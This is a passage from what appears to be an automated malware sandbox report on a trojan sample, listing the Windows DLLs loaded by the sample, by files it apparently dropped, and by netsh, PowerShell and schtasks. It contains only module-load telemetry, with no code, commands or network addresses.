Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: apphelp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winmm.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rstrtmgr.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncrypt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ntasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d11.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxgi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: resourcepolicyclient.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d10warp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: webio.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: iphlpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winnsi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dnsapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rasadhlp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: fwpuclnt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: schannel.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mskeyprotect.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncryptsslp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: msasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: gpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winmm.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rstrtmgr.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncrypt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ntasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d11.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxgi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: resourcepolicyclient.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d10warp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: webio.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: iphlpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winnsi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dnsapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rasadhlp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: fwpuclnt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: schannel.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mskeyprotect.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncryptsslp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: msasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: oleacc.dll
